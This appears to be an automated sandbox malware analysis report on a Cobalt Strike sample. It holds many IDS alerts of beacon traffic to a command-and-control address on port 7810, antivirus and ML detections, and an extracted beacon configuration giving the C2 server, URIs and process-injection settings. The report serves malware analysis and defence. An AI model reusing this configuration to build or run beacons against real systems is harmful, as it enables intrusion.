2024-10-07T22:01:44.253610+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50036	89.197.154.116	7810	TCP
2024-10-07T22:01:45.937035+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50047	89.197.154.116	7810	TCP
2024-10-07T22:01:47.705942+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50056	89.197.154.116	7810	TCP
2024-10-07T22:01:49.411092+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50061	89.197.154.116	7810	TCP
2024-10-07T22:01:51.121962+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50062	89.197.154.116	7810	TCP
2024-10-07T22:01:52.812386+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50063	89.197.154.116	7810	TCP
2024-10-07T22:01:54.523649+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50064	89.197.154.116	7810	TCP
2024-10-07T22:01:56.234251+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50065	89.197.154.116	7810	TCP
2024-10-07T22:01:57.943671+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50066	89.197.154.116	7810	TCP
2024-10-07T22:01:59.659436+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50067	89.197.154.116	7810	TCP
2024-10-07T22:02:00.965734+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50068	89.197.154.116	7810	TCP
2024-10-07T22:02:02.745780+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50069	89.197.154.116	7810	TCP
2024-10-07T22:02:04.531226+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50070	89.197.154.116	7810	TCP
2024-10-07T22:02:06.279916+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50071	89.197.154.116	7810	TCP
2024-10-07T22:02:07.987670+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50072	89.197.154.116	7810	TCP
2024-10-07T22:02:09.688424+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50073	89.197.154.116	7810	TCP
2024-10-07T22:02:11.375813+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50074	89.197.154.116	7810	TCP
2024-10-07T22:02:13.110536+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50075	89.197.154.116	7810	TCP
2024-10-07T22:02:14.797259+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50076	89.197.154.116	7810	TCP
2024-10-07T22:02:18.921867+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50077	89.197.154.116	7810	TCP
2024-10-07T22:02:20.671891+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50078	89.197.154.116	7810	TCP
2024-10-07T22:02:22.359658+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50079	89.197.154.116	7810	TCP
2024-10-07T22:02:24.047079+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50080	89.197.154.116	7810	TCP
2024-10-07T22:02:25.775690+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50081	89.197.154.116	7810	TCP
2024-10-07T22:02:27.509125+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50082	89.197.154.116	7810	TCP
2024-10-07T22:02:29.296493+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50083	89.197.154.116	7810	TCP
2024-10-07T22:02:30.987183+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50084	89.197.154.116	7810	TCP
2024-10-07T22:02:32.843335+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50085	89.197.154.116	7810	TCP
2024-10-07T22:02:34.579818+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50086	89.197.154.116	7810	TCP
2024-10-07T22:02:36.284525+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50087	89.197.154.116	7810	TCP
2024-10-07T22:02:37.991762+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50088	89.197.154.116	7810	TCP
2024-10-07T22:02:39.922933+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50089	89.197.154.116	7810	TCP
2024-10-07T22:02:41.609244+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50090	89.197.154.116	7810	TCP
2024-10-07T22:02:43.394927+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50091	89.197.154.116	7810	TCP
2024-10-07T22:02:45.110616+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50092	89.197.154.116	7810	TCP
2024-10-07T22:02:46.838712+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50093	89.197.154.116	7810	TCP
2024-10-07T22:02:48.670293+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50094	89.197.154.116	7810	TCP
2024-10-07T22:02:50.382420+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50095	89.197.154.116	7810	TCP
2024-10-07T22:02:52.127731+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50096	89.197.154.116	7810	TCP
2024-10-07T22:02:53.847880+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50097	89.197.154.116	7810	TCP
2024-10-07T22:02:55.531342+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50098	89.197.154.116	7810	TCP
2024-10-07T22:02:57.239729+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50099	89.197.154.116	7810	TCP
2024-10-07T22:02:59.271603+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50100	89.197.154.116	7810	TCP
2024-10-07T22:03:01.004317+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50101	89.197.154.116	7810	TCP
2024-10-07T22:03:03.244781+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50102	89.197.154.116	7810	TCP
2024-10-07T22:03:04.960032+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50103	89.197.154.116	7810	TCP
2024-10-07T22:03:06.689840+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50104	89.197.154.116	7810	TCP
2024-10-07T22:03:08.399776+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50105	89.197.154.116	7810	TCP
2024-10-07T22:03:11.048493+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50106	89.197.154.116	7810	TCP
2024-10-07T22:03:12.779771+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50107	89.197.154.116	7810	TCP
2024-10-07T22:03:14.471824+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50108	89.197.154.116	7810	TCP
2024-10-07T22:03:16.195755+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50109	89.197.154.116	7810	TCP
2024-10-07T22:03:20.324957+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50110	89.197.154.116	7810	TCP
2024-10-07T22:03:22.036589+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50111	89.197.154.116	7810	TCP
2024-10-07T22:03:23.736122+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50112	89.197.154.116	7810	TCP
2024-10-07T22:03:25.438851+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50113	89.197.154.116	7810	TCP
2024-10-07T22:03:27.125403+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50114	89.197.154.116	7810	TCP
2024-10-07T22:03:31.246894+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50115	89.197.154.116	7810	TCP
2024-10-07T22:03:32.940347+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50116	89.197.154.116	7810	TCP
2024-10-07T22:03:34.924692+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50117	89.197.154.116	7810	TCP
2024-10-07T22:03:36.647798+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50118	89.197.154.116	7810	TCP
2024-10-07T22:03:38.367772+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50119	89.197.154.116	7810	TCP
2024-10-07T22:03:40.067334+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50120	89.197.154.116	7810	TCP
2024-10-07T22:03:41.793351+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50121	89.197.154.116	7810	TCP
2024-10-07T22:03:43.493833+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50122	89.197.154.116	7810	TCP
2024-10-07T22:03:45.472141+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50123	89.197.154.116	7810	TCP
2024-10-07T22:03:47.489094+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50124	89.197.154.116	7810	TCP
2024-10-07T22:03:49.298704+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50125	89.197.154.116	7810	TCP
2024-10-07T22:03:51.006116+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50126	89.197.154.116	7810	TCP
2024-10-07T22:03:52.816640+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50127	89.197.154.116	7810	TCP
2024-10-07T22:03:54.507410+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50128	89.197.154.116	7810	TCP
2024-10-07T22:03:56.419858+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50129	89.197.154.116	7810	TCP
2024-10-07T22:03:58.135993+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50130	89.197.154.116	7810	TCP
2024-10-07T22:03:59.879302+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50131	89.197.154.116	7810	TCP
2024-10-07T22:04:01.843457+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50132	89.197.154.116	7810	TCP
2024-10-07T22:04:03.584335+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50133	89.197.154.116	7810	TCP
2024-10-07T22:04:07.715970+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50134	89.197.154.116	7810	TCP
2024-10-07T22:04:10.473796+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50135	89.197.154.116	7810	TCP

ET MALWARE Cobalt Strike Related Activity (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T22:00:04.887327+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49730	89.197.154.116	7810	TCP
2024-10-07T22:00:06.825937+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49731	89.197.154.116	7810	TCP
2024-10-07T22:00:08.534715+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49732	89.197.154.116	7810	TCP
2024-10-07T22:00:10.264513+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49733	89.197.154.116	7810	TCP
2024-10-07T22:00:12.028170+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49734	89.197.154.116	7810	TCP
2024-10-07T22:00:13.851716+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49735	89.197.154.116	7810	TCP
2024-10-07T22:00:15.567674+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49736	89.197.154.116	7810	TCP
2024-10-07T22:00:17.303031+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49737	89.197.154.116	7810	TCP
2024-10-07T22:00:19.019522+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49738	89.197.154.116	7810	TCP
2024-10-07T22:00:20.715916+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49741	89.197.154.116	7810	TCP
2024-10-07T22:00:22.559096+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49745	89.197.154.116	7810	TCP
2024-10-07T22:00:24.295931+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49747	89.197.154.116	7810	TCP
2024-10-07T22:00:26.003982+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49748	89.197.154.116	7810	TCP
2024-10-07T22:00:27.767095+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49749	89.197.154.116	7810	TCP
2024-10-07T22:00:29.450557+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49750	89.197.154.116	7810	TCP
2024-10-07T22:00:33.574658+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49751	89.197.154.116	7810	TCP
2024-10-07T22:00:35.545658+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49752	89.197.154.116	7810	TCP
2024-10-07T22:00:37.247360+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49753	89.197.154.116	7810	TCP
2024-10-07T22:00:38.969491+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49754	89.197.154.116	7810	TCP
2024-10-07T22:00:40.675331+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49755	89.197.154.116	7810	TCP
2024-10-07T22:00:42.358293+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49756	89.197.154.116	7810	TCP
2024-10-07T22:00:44.092723+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49757	89.197.154.116	7810	TCP
2024-10-07T22:00:45.812862+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49758	89.197.154.116	7810	TCP
2024-10-07T22:00:47.535783+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49759	89.197.154.116	7810	TCP
2024-10-07T22:00:49.272785+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49760	89.197.154.116	7810	TCP
2024-10-07T22:00:50.988910+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49761	89.197.154.116	7810	TCP
2024-10-07T22:00:52.881734+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49762	89.197.154.116	7810	TCP
2024-10-07T22:00:54.576802+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49763	89.197.154.116	7810	TCP
2024-10-07T22:00:56.263309+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49764	89.197.154.116	7810	TCP
2024-10-07T22:00:57.971739+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49765	89.197.154.116	7810	TCP
2024-10-07T22:00:59.680335+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49767	89.197.154.116	7810	TCP
2024-10-07T22:01:01.395075+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49769	89.197.154.116	7810	TCP
2024-10-07T22:01:03.285490+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49780	89.197.154.116	7810	TCP
2024-10-07T22:01:04.987483+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49791	89.197.154.116	7810	TCP
2024-10-07T22:01:06.689132+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49807	89.197.154.116	7810	TCP
2024-10-07T22:01:08.658738+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49818	89.197.154.116	7810	TCP
2024-10-07T22:01:10.359503+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49825	89.197.154.116	7810	TCP
2024-10-07T22:01:12.084607+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49840	89.197.154.116	7810	TCP
2024-10-07T22:01:13.796875+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49851	89.197.154.116	7810	TCP
2024-10-07T22:01:15.534739+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49857	89.197.154.116	7810	TCP
2024-10-07T22:01:17.252714+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49868	89.197.154.116	7810	TCP
2024-10-07T22:01:18.941423+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49879	89.197.154.116	7810	TCP
2024-10-07T22:01:20.873023+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49894	89.197.154.116	7810	TCP
2024-10-07T22:01:22.591355+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49906	89.197.154.116	7810	TCP
2024-10-07T22:01:24.295453+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49918	89.197.154.116	7810	TCP
2024-10-07T22:01:25.987531+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49931	89.197.154.116	7810	TCP
2024-10-07T22:01:30.231283+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49939	89.197.154.116	7810	TCP
2024-10-07T22:01:31.987185+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49964	89.197.154.116	7810	TCP
2024-10-07T22:01:33.703695+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49974	89.197.154.116	7810	TCP
2024-10-07T22:01:35.440140+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49985	89.197.154.116	7810	TCP
2024-10-07T22:01:37.248186+0200	2036677	1	A Network Trojan was detected	192.168.2.4	49999	89.197.154.116	7810	TCP
2024-10-07T22:01:38.959548+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50010	89.197.154.116	7810	TCP
2024-10-07T22:01:40.674934+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50022	89.197.154.116	7810	TCP
2024-10-07T22:01:42.555618+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50031	89.197.154.116	7810	TCP
2024-10-07T22:01:44.253610+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50036	89.197.154.116	7810	TCP
2024-10-07T22:01:45.937035+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50047	89.197.154.116	7810	TCP
2024-10-07T22:01:47.705942+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50056	89.197.154.116	7810	TCP
2024-10-07T22:01:49.411092+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50061	89.197.154.116	7810	TCP
2024-10-07T22:01:51.121962+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50062	89.197.154.116	7810	TCP
2024-10-07T22:01:52.812386+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50063	89.197.154.116	7810	TCP
2024-10-07T22:01:54.523649+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50064	89.197.154.116	7810	TCP
2024-10-07T22:01:56.234251+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50065	89.197.154.116	7810	TCP
2024-10-07T22:01:57.943671+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50066	89.197.154.116	7810	TCP
2024-10-07T22:01:59.659436+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50067	89.197.154.116	7810	TCP
2024-10-07T22:02:00.965734+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50068	89.197.154.116	7810	TCP
2024-10-07T22:02:02.745780+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50069	89.197.154.116	7810	TCP
2024-10-07T22:02:04.531226+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50070	89.197.154.116	7810	TCP
2024-10-07T22:02:06.279916+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50071	89.197.154.116	7810	TCP
2024-10-07T22:02:07.987670+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50072	89.197.154.116	7810	TCP
2024-10-07T22:02:09.688424+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50073	89.197.154.116	7810	TCP
2024-10-07T22:02:11.375813+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50074	89.197.154.116	7810	TCP
2024-10-07T22:02:13.110536+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50075	89.197.154.116	7810	TCP
2024-10-07T22:02:14.797259+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50076	89.197.154.116	7810	TCP
2024-10-07T22:02:18.921867+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50077	89.197.154.116	7810	TCP
2024-10-07T22:02:20.671891+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50078	89.197.154.116	7810	TCP
2024-10-07T22:02:22.359658+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50079	89.197.154.116	7810	TCP
2024-10-07T22:02:24.047079+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50080	89.197.154.116	7810	TCP
2024-10-07T22:02:25.775690+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50081	89.197.154.116	7810	TCP
2024-10-07T22:02:27.509125+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50082	89.197.154.116	7810	TCP
2024-10-07T22:02:29.296493+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50083	89.197.154.116	7810	TCP
2024-10-07T22:02:30.987183+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50084	89.197.154.116	7810	TCP
2024-10-07T22:02:32.843335+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50085	89.197.154.116	7810	TCP
2024-10-07T22:02:34.579818+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50086	89.197.154.116	7810	TCP
2024-10-07T22:02:36.284525+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50087	89.197.154.116	7810	TCP
2024-10-07T22:02:37.991762+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50088	89.197.154.116	7810	TCP
2024-10-07T22:02:39.922933+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50089	89.197.154.116	7810	TCP
2024-10-07T22:02:41.609244+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50090	89.197.154.116	7810	TCP
2024-10-07T22:02:43.394927+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50091	89.197.154.116	7810	TCP
2024-10-07T22:02:45.110616+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50092	89.197.154.116	7810	TCP
2024-10-07T22:02:46.838712+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50093	89.197.154.116	7810	TCP
2024-10-07T22:02:48.670293+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50094	89.197.154.116	7810	TCP
2024-10-07T22:02:50.382420+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50095	89.197.154.116	7810	TCP
2024-10-07T22:02:52.127731+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50096	89.197.154.116	7810	TCP
2024-10-07T22:02:53.847880+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50097	89.197.154.116	7810	TCP
2024-10-07T22:02:55.531342+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50098	89.197.154.116	7810	TCP
2024-10-07T22:02:57.239729+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50099	89.197.154.116	7810	TCP
2024-10-07T22:02:59.271603+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50100	89.197.154.116	7810	TCP
2024-10-07T22:03:01.004317+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50101	89.197.154.116	7810	TCP
2024-10-07T22:03:03.244781+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50102	89.197.154.116	7810	TCP
2024-10-07T22:03:04.960032+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50103	89.197.154.116	7810	TCP
2024-10-07T22:03:06.689840+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50104	89.197.154.116	7810	TCP
2024-10-07T22:03:08.399776+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50105	89.197.154.116	7810	TCP
2024-10-07T22:03:11.048493+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50106	89.197.154.116	7810	TCP
2024-10-07T22:03:12.779771+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50107	89.197.154.116	7810	TCP
2024-10-07T22:03:14.471824+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50108	89.197.154.116	7810	TCP
2024-10-07T22:03:16.195755+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50109	89.197.154.116	7810	TCP
2024-10-07T22:03:20.324957+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50110	89.197.154.116	7810	TCP
2024-10-07T22:03:22.036589+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50111	89.197.154.116	7810	TCP
2024-10-07T22:03:23.736122+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50112	89.197.154.116	7810	TCP
2024-10-07T22:03:25.438851+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50113	89.197.154.116	7810	TCP
2024-10-07T22:03:27.125403+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50114	89.197.154.116	7810	TCP
2024-10-07T22:03:31.246894+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50115	89.197.154.116	7810	TCP
2024-10-07T22:03:32.940347+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50116	89.197.154.116	7810	TCP
2024-10-07T22:03:34.924692+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50117	89.197.154.116	7810	TCP
2024-10-07T22:03:36.647798+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50118	89.197.154.116	7810	TCP
2024-10-07T22:03:38.367772+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50119	89.197.154.116	7810	TCP
2024-10-07T22:03:40.067334+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50120	89.197.154.116	7810	TCP
2024-10-07T22:03:41.793351+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50121	89.197.154.116	7810	TCP
2024-10-07T22:03:43.493833+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50122	89.197.154.116	7810	TCP
2024-10-07T22:03:45.472141+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50123	89.197.154.116	7810	TCP
2024-10-07T22:03:47.489094+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50124	89.197.154.116	7810	TCP
2024-10-07T22:03:49.298704+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50125	89.197.154.116	7810	TCP
2024-10-07T22:03:51.006116+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50126	89.197.154.116	7810	TCP
2024-10-07T22:03:52.816640+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50127	89.197.154.116	7810	TCP
2024-10-07T22:03:54.507410+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50128	89.197.154.116	7810	TCP
2024-10-07T22:03:56.419858+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50129	89.197.154.116	7810	TCP
2024-10-07T22:03:58.135993+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50130	89.197.154.116	7810	TCP
2024-10-07T22:03:59.879302+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50131	89.197.154.116	7810	TCP
2024-10-07T22:04:01.843457+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50132	89.197.154.116	7810	TCP
2024-10-07T22:04:03.584335+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50133	89.197.154.116	7810	TCP
2024-10-07T22:04:07.715970+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50134	89.197.154.116	7810	TCP
2024-10-07T22:04:10.473796+0200	2036677	1	A Network Trojan was detected	192.168.2.4	50135	89.197.154.116	7810	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: P3KxDOMmD3.exe

Avira: detected

Found malware configuration

Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTP"], "Port": 7810, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "89.197.154.116,/cm", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}

Multi AV Scanner detection for submitted file

Source: P3KxDOMmD3.exe

ReversingLabs: Detection: 86%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: P3KxDOMmD3.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_00661184 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,		0_2_00661184
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_00692020 CryptGenRandom,		0_2_00692020

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe

Unpacked PE file: 0.2.P3KxDOMmD3.exe.660000.2.unpack

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_00679220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,		0_2_00679220
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_00671C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,		0_2_00671C30

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe

Code function: 4x nop then sub rsp, 28h

0_2_00402314

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49741 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49741 -> 89.197.154.116:7810
